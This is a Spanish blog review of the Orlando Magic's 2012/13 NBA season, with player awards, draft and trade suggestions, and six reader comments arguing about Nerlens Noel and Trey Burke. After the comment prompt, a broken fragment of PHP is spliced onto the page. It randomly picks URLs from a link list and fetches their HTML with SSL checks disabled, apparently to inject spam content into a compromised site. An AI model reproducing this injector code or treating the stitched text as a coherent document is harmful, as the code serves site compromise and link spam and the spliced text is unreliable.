Orlando Magic: Muy deficiente

24 de June de 2013 por TheDeerHunter

Se veía venir. Sobre el papel Orlando ha sido el peor equipo de la 2012/13 y ha pasado en un tiempo récord de superar el 70% de victorias y ser considerados candidatos al anillo a no alcanzar el 25% y llevarse la cuchara de madera. Por si fuera poco, la suerte no les ha acompañado en la lotería y les ha tocado en suerte una segunda elección de un draft previsiblemente flojo según los analistas.

Viendo como se reinventaron los Nuggets post-Melo y asumiendo el valor superior de los hombres grandes en el mercado no quedaba en buen lugar la gestión del fin de la era Howard. Nuestra impresión inicial del trabajo de Rob Hennigan no pudo ser peor, y eso que heredaba el cargo de Otis Thorpe y su malsana afición a coleccionar contratos tóxicos. Con el tiempo, no obstante, ha demostrado audacia y buen ojo en la mayor parte de las decisiones tomadas e incluso parece claro que los Magic fueron los vencedores del traspaso múltiple que llevó a Howard a L.A. Quién lo hubiera dicho. En cualquier caso hay que admitir que la situación no era nada fácil y la travesía por el desierto era prácticamente inevitable.

En términos inmediatos la temporada ha sido catastrófica pero engañosa. De no haber tanta calamidad de por medio es difícil creer que hubieran terminado últimos. Ya advertimos que con estos mimbres, a poco que aparecieran imprevistos, podíamos encontrarnos con alineaciones de sonrojo (y así ha sido) pero el núcleo duro de la plantilla, cuando ha estado sano, ha rendido de manera notable. Hay más jugadores que nos han sorprendido gratamente que al contrario.

En el verano del 2014 es cuando saldrán de los libros de cuentas los excesos cometidos en el pasado reciente. Hasta ese momento el objetivo sigue siendo la captación y el desarrollo de jóvenes talentos, la formación de un armazón para a partir de esa fecha poner la guinda con el fichaje de algún gran agente libre que les pueda dar el salto de calidad definitivo. 

PREMIOS

MVP: Además de ser el jugador que más partidos ha podido disputar, Nikola Vucevic se ha consolidado en su segundo año como uno de los interiores más sólidos de la liga. Con un doble-doble de promedio, el montenegrino se ha ganado la etiqueta de imprescindible para el futuro inmediato de la franquicia.

Rookie: Mo Harkless es uno de los hombres que ha dado un paso al frente en los peores momentos. Aprovechó bien su oportunidad para ganarse el puesto de titular con un gran rendimiento de Febrero a Abril.

Sorpresa: La salida de JJ Redick no terminó de gustar a mucha gente pero los aficionados no tardaron en olvidarle por culpa de un Tobias Harris desatado. Puede que estemos ante el nuevo líder de Orlando Magic. Añadimos en este apartado a Rob Hennigan, al que llegamos a comparar con el Pato Donald.

Decepción: Es difícil calificar de decepción a Hedo Turkoglu a estas alturas pero más difícil es estropear de esta forma los buenos recuerdos que dejó en su primera etapa en la franquicia.

Esfuerzo en vano: A sus 31 años Jameer Nelson se ha destapado con una de las mejores campañas de su carrera. Su compromiso en los peores momentos que ha vivido con la camiseta de los Magic es incuestionable y su veteranía, un valor incalculable. Inmenso profesional y excelente ejemplo para esta joven plantilla.

JUGANDO A GM

  • Turkoglu debe salir a patadas. Previsiblemente Harrington también será cortado, aunque en tono distinto. Ambos tienen contrato el próximo curso pero sólo parcialmente garantizado. Aunque se les podría encontrar utilidad no pueden cortar la progresión de otros en ningún caso.
  • Habría que escuchar ofertas por Afflalo y/o Davis. A pesar de que son perfectamente aprovechables rompen un poco con el perfil buscado, cortan la progresión que pueden tener otros y tienen un buen cartel para obtener tajada de ellos.
  • En un draft donde no parece haber un nombre que pueda marcar el rumbo de una franquicia yo me la jugaría, a ser posible, con Nerlens Noel. El riesgo es alto pero también puede serlo la recompensa dado su potencial. Orlando puede perfectamente esperar a Navidad por él, retrasando el hipotético traspaso de Davis hasta ese momento. Si Noel no está disponible se contemplan los mejores escoltas del draft y esto es ilustrativo de la estrategia que se persigue en según qué casos.
  • A pesar de quedar únicamente Nelson como base puro no veo a Udrih en el equipo el año que viene. Si le firman será para traspasarlo. Orlando también tiene la opción de cortar a Moore antes del 1 de Julio, ahorrándose el salario. Yo no lo haría. Por otro lado últimamente sonaba la posibilidad de Bledsoe a cambio de Afflalo. Con los ojos cerrados.
  • Por último probablemente renovaría tanto a Kyle O’Quinn como a DeQuan Jones evitando entrar este año en el mercado de agentes libres.
Comenta

6 comentarios a esta entrada

  1. Denise dice:
    #1

    El articulo es muy bueno y lleva toda la razón, pero el titulo-nota no.
    No se puede calificar la temporada de Orlando como muy deficiente, cuando ha tenido casi todos los jugadores importantes lesionados. Recuerdo que cuando Glen Davis que estaba siendo su jugador franquicia se lesiona, los Magic estaban a 1 victoria de Playoffs con un balance de 12-13. Despuñes de la lesión, perdió como 25 partidos de 30 pero, a botepronto, puede haber como una decena de partidos que se les ha escapado en el ultimo minuto por no disponer de un buen clutch-player. Pero siempre han dado la cara y han dejado una buena impresión.
    Con lo que hay que quedarse es que han descubierto una buena base de jugadores my utiles para el futuro, especialmente Harkless que puede ser una versión de Kawhi Leonard, Vucevic un center de futuro, y Harris un notable sexto-hombre más la progresión de los otros jovenes como Nicholson.

    Y si, en los proximos dias se espera que Turkoglu sea cortado a razón de 6 millones, al igual que Harrington al que tendrán que pagarle 3,5 esta temporada y otros 3,5 la que viene. El GM lo está haciendo bien teniendo en cuenta la herencia, a ver si hubiera suerte en el Draft aunque yo no eligiría ni loco a Noel.
    Creo que el elegido será McLemore, aunque yo eligiría a Trey Burke.

    Y por último, lo de Bledsoe no creo que se haga, porque tiene pinta de que Garnett va a acabar en Clippers, y lo más logico sería que Bledsoe entrase en la operación.

      Citar

  2. TheDeerHunter dice:
    #2

    Yo creo que podemos estar de acuerdo en que han estado por encima de lo esperado, que no era mucho en mi caso. El tema de las lesiones, obviamente ha influido en el resultado final, pero también les ha permitido encontrar valor a determinadas piezas. Opino que las aspiraciones del equipo influyen en la duración y tratamiento de lesiones y ausencias, así que no creo que la mala suerte por si misma haya determinado tanto el resultado final, más allá de quedar últimos o penúltimos.

    La calificación es lo de menos. Admito que tenía dudas, pero pensando friamente en haber terminado con ese balance, haber cuajado partidos de auténtica pena, no tener suerte en la lotería y encima ante un draft mediocre a priori, no podemos considerar su campaña mucho más positivamente. Hay pequeños destellos de esperanza, pero a este equipo aún le queda bastante camino por recorrer para salir del pozo.

    Por último, si admitimos su balance final como circunstancial, también hay que hacerlo con el 12-13 que tú comentas, con 2 victorias contra Detroit, Phoenix… y 1 contra Cleveland, Bobcats, Washington o Minnesotta hasta aquel momento. Engañoso.

      Citar

  3. Ruxixón dice:
    #3

    Yo tampoco estoy de acuerdo con la nota pero obviando claramente el balance de una temporada que es el AÑO 0 para Orlando.Creo que tienen muchos mimbres para seguir desarrollando,entre ellos el rookie que llegue con el nº 2 en este draft tan poco definido.

    Aunque parece una incoherencia,no elegir en el 1 para ellos es una bendición.Si te equivocas en el pick 1 siempre quedas recordado.No sé si Denise,que es el más fiel seguidor de Orlando del blog,está de acuerdo.En su día me parecía Noel la elección más acertada pero a día de hoy escogería a Burke.Creo que un buen equipo se hace a partir de un base y un interior (de esto ya tienen) y cuanto antes se conozcan mejor,ya que gran parte de la base sobre la que pivotarán los Magic está ya en la plantilla.Además no hay presión y el año que viene añadirán a un potencial All Star,salvo sorpresa mayúscula.Todo esto con un Nelson mermado pero que en este equipo no hace daño.

    Por lo demás,de entre todo el grupo de jugadores Tobias me encanta,y en este OFF Season se le ha visto todavía más fuerte,así que si tuviera que apostar por un MIP mi voto sería para él.

    Affalo y Glen Davis carne de traspaso esta temporada al 99.9%.Yo no apostaría por Bledsoe por PG titular,creo que su rol es el que es,ese jugador que da energía desde el banquillo.Como dije allá arriba mejor apostar por Burke y mirar otros movimientos con los activos más movibles del equipo.

      Citar

  4. Denise dice:
    #4

    Ruxixón:
    Yo tampoco estoy de acuerdo con la nota pero obviando claramente el balance de una temporada que es el AÑO 0 para Orlando.Creo que tienen muchos mimbres para seguir desarrollando,entre ellos el rookie que llegue con el nº 2 en este draft tan poco definido.

    Aunque parece una incoherencia,no elegir en el 1 para ellos es una bendición.Si te equivocas en el pick 1 siempre quedas recordado.No sé si Denise,que es el más fiel seguidor de Orlando del blog,está de acuerdo.En su día me parecía Noel la elección más acertada pero a día de hoy escogería a Burke.Creo que un buen equipo se hace a partir de un base y un interior (de esto ya tienen) y cuanto antes se conozcan mejor,ya que gran parte de la base sobre la que pivotarán los Magic está ya en la plantilla.Además no hay presión y el año que viene añadirán a un potencial All Star,salvo sorpresa mayúscula.Todo esto con un Nelson mermado pero que en este equipo no hace daño.

    Por lo demás,de entre todo el grupo de jugadores Tobias me encanta,y en este OFF Season se le ha visto todavía más fuerte,así que si tuviera que apostar por un MIP mi voto sería para él.

    Affalo y Glen Davis carne de traspaso esta temporada al 99.9%.Yo no apostaría por Bledsoe por PG titular,creo que su rol es el que es,ese jugador que da energía desde el banquillo.Como dije allá arriba mejor apostar por Burke y mirar otros movimientos con los activos más movibles del equipo.

    Si, estoy bastante de acuerdo con tu comentario.
    Siempre digo que salvo que llegue un All-Star no añadiría ningún otro jugador importante para la pintura y quien draftee a Noel creo que va a cometer un epic fail, posiblemente pueda equivocarme pero creo que va a ser un Shelden Williams de la vida pero medio lesionado encima.

    Ojala me equivoque pero a Burke no lo van a draftear directamente. Si se hacen con él, creo que sería mediante un trade posterior o comprando otro pick.

      Citar

  5. TheDeerHunter dice:
    #5

    ¿Pero en qué diantres se parece Noel a Shelden Williams?
    No me considero un experto en melones, pero el único que me ha impresionado verdaderamente es Noel… asumiendo por supuesto un riesgo con él.
    Además en condiciones ideales sería una elección coherente a las tradicionales grandes elecciones de Orlando. Hasta la camiseta le quedaría bien…

    Creo que es un draft perfecto para asumir riesgos, porque diría que muy pocos están en condiciones de reforzar eficazmente al equipo y al mismo tiempo no hay muchas franquicias que se puedan permitir el lujo de apostar fuerte como Orlando para cambiar su situación. Total, para apostar por alguien que no te va a sacar de pobre ni de rico en un draft muy dudoso te la juegas al de más potencial si te llega.

    De todas formas parece claro que Cavaliers no lo van a dejar pasar… y ellos hace tiempo que abandonaron la idea de Burke. Oladipo o McLemore…. yo me quedaba con el segundo, que conste.

      Citar

  6. Denise dice:
    #6

    TheDeerHunter: ¿Pero en qué diantres se parece Noel a Shelden Williams?No me considero un experto en melones, pero el único que me ha impresionado verdaderamente es Noel… asumiendo por supuesto un riesgo con él.Además en condiciones ideales sería una elección coherente a las tradicionales grandes elecciones de Orlando. Hasta la camiseta le quedaría bien…Creo que es un draft perfecto para asumir riesgos, porque diría que muy pocos están en condiciones de reforzar eficazmente al equipo y al mismo tiempo no hay muchas franquicias que se puedan permitir el lujo de apostar fuerte como Orlando para cambiar su situación. Total, para apostar por alguien que no te va a sacar de pobre ni de rico en un draft muy dudoso te la juegas al de más potencial si te llega.De todas formas parece claro que Cavaliers no lo van a dejar pasar… y ellos hace tiempo que abandonaron la idea de Burke. Oladipo o McLemore…. yo me quedaba con el segundo, que conste.

    En los videos que he visto de él, solo es un Shelden Williams ó un Tyrus Thomas de la vida..
    Ofensivamente un cero a la izquierda y defensivamente si, pone tapones y rebotea, pero nada del otro mundo que no pueda hacer otro pivot, si a eso le sumas que ya viene cascado con lesiones, me parecería un error draftearlo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>